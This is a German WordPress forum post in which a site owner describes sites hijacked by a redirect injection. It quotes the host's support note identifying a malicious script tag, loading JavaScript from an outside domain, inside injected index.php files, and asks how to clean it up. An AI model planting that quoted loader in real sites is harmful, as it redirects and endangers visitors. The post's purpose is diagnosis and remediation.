Seiten verseucht mit script; wer hat Ähnliches?
-
Hallo miteinander,
Ich habe verschiedene Sites bei zwei verschiedenen Hostern. Bei einem komme ich sowohl im Frontend als auch Backend nicht mehr hinein. Ich lande immer auf folgender Seite: https://redfunchicken.com/?p=mvstqmjwmy5gi3bpgeztmoa&sub2=seller55Vom Support erhielt ich folgende Information:
„Scheinbar sind die genannten Webseiten mit Schadsoftware kompromittiert
welche diese Weiterleitung beim Aufruf durchführt.Ich habe mir dazu einmal die Installationen angeschaut und konnte hier
feststellen das in den Unterordnern der Installationen jeweils immer
eine index.php mit folgenden Inhalt hinterlegt ist.<script type=’text/javascript‘
src=’https://dest.collectfasttracks.com/y.js‘></script><?phpHierbei handelt es sich um eine Injektion von einer Weiterleitung.
Dahingehend wäre es empfehlenswert, falls vorhanden, entsprechende
Backups der Installationen einzuspielen. Wenn man zu 100% sicher gehen
will sollte man die Seiten aber neu aufbauen. Da man nie sagen kann ob
in etwaigen Backups sich bereits schlafender Schadhafter Code befindet.Erfahrungsgemäß werden solche Hacks oftmals durch veraltete Plugins,
Themes oder CMS-Installationen bzw. Webseitenfunktionen aber auch zu
offene Berechtigungen in der Installation ausgelöst. Dahingehend ist es
empfehlenswert alle Inhalte immer möglichst aktuell zu halten und auf
veraltete Funktionen zu verzichten.“Jetzt habe ich auf meinen Seiten geschaut und festgestellt, dass
farbsteinchen.de – auf dem anderen Hoster – ebenfalls dieses Script vorhanden ist. Mit search and Replace habe ich es gelöscht.Bei dieser Seite ist es nicht so schlimm, denn sie führt auf eine andere
Seite, die nicht aufgerufen werden kann.An meiner Hauptseite 8ung.info habe ich dieses Script ebenfalls entdeckt, siehe Search ans Replace:
„Es wurde ein Testlauf durchgeführt. An der Datenbank wurden keine
Änderungen vorgenommen und es wurde keine SQL-Datei geschrieben.
66 Tabellen wurden verarbeitet.460 cells need to be updated.“Diese Seite funktioniert noch. Allerdings gingen die Klickzahlen in den letzten Monaten dramatisch zurück. Ich wage nicht, das Script zu löschen oder irgendetwas damit zu machen, denn meistens verschlimmbessere ich alles, was mit Technik zu tun hat.
Diese Site ist mir sehr wichtig!
Für allinkl ist die Suche zu aufwändig – verständlich.
Aber was soll ich jetzt machen?
Wer weiß Rat?Lieben gruß
8ungDie Seite, für die ich Hilfe brauche: [Anmelden, um den Link zu sehen]
- Das Thema „Seiten verseucht mit script; wer hat Ähnliches?“ ist für neue Antworten geschlossen.